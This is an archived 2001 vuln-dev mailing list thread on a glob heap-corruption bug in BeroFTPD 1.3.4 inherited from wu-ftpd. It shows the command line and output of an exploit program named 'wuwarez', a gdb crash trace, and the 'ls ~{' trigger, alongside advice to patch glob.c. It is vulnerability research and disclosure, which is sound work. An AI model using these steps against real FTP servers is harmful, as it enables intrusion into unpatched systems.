Vulnerability Development mailing list archives
Re: Older BeroFTPD glob
From: "Eduardo Cruz" <eduardo.cruz () tsg com>
Date: Mon, 10 Dec 2001 02:44:34 +0100
hi kf, yes by default of course it is. And past and future "standard" wuftpd bugs will affect beroftpd. for 1.3.4 just change the glob.c for the glob.c i attached on my last post. And dont forget that there are a few back-time wuftpd bugs that are present in bero. have fun :) ----- Original Message ----- From: "KF" <dotslash () snosoft com> To: <eduardo.cruz () tsg com>; <vuln-dev () security-focus com> Sent: Friday, January 02, 1970 12:09 AM Subject: re: Older BeroFTPD glob
In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was not vuln by default compile. I compiled it from the latest source on the wu-ftpd.org ftp server. Bare with no patches I get the following result... which was the same with earlier versions. Again I am on a ppc linux box: [root@ibook root]# java wuwarez 42424242 0 localhost anonymous Shellcode is 44 bytes long return is 42424242 Got Socket Sleeping so that you can attach a debugger 220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003)
ready.
Sending username 331 Guest login ok, send your complete e-mail address as password. sending mal buffer as the passwd ÿüÿþ;230 Guest login ok, access restrictions apply. Populate Heap...needs more work (program exit) [root@ibook root]# (This is what we saw when we attached the debugger) [root@ibook src]# ps -ef | grep ftpd ftp 2035 790 0 14:55 ? 00:00:00 ftpd: localhost.localdomain: anonymous [root@ibook src]# gdb ./ftpd 2035 Program received signal SIGSEGV, Segmentation fault. 0xfeb6cfc in free () from /lib/libc.so.6 (gdb) bt #0 0xfeb6cfc in free () from /lib/libc.so.6 #1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604 #2 0x1000dd04 in yyparse () at ftpcmd.y:1246 #3 0x10002cac in main (argc=268566528, argv=0x7ffffc74, envp=0x1003e828) at ftpd.c:1221 #4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6 Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035 -KF From: "Eduardo Cruz" <eduardo.cruz () tsg com> <mailto:eduardo.cruz () tsg com> Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific To: "KF" <dotslash () snosoft com> <mailto:dotslash () snosoft com>, <vuln-dev () security-focus com> <mailto:vuln-dev () security-focus com> Subject: Re: Older BeroFTPD glob Connected to localhost. 220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001) ready. Name (localhost:root): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@cimitarra <mailto:root@cimitarra> 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls ~{ 200 PORT command successful. 550 Missing } ftp> just patch glob.c ur self, or use the mine already patched (attached). And about the maintenance of beroftp, as far as i know is not being done since years ago. Anyway appart from the bugs derivating from vuftpd i dont see the point on maintaining bero, i find it quite perfect like it is. have fun
Current thread:
- Older BeroFTPD glob KF (Dec 09)
- Re: Older BeroFTPD glob Eduardo Cruz (Dec 09)
- Re: Older BeroFTPD glob Bernhard Rosenkraenzer (Dec 09)
- Re: Older BeroFTPD glob Eduardo Cruz (Dec 10)
- Re: Older BeroFTPD glob Bernhard Rosenkraenzer (Dec 10)
- Re: Older BeroFTPD glob Bernhard Rosenkraenzer (Dec 09)
- Re: Older BeroFTPD glob Eduardo Cruz (Dec 09)
- <Possible follow-ups>
- re: Older BeroFTPD glob KF (Dec 09)
- Re: Older BeroFTPD glob Eduardo Cruz (Dec 10)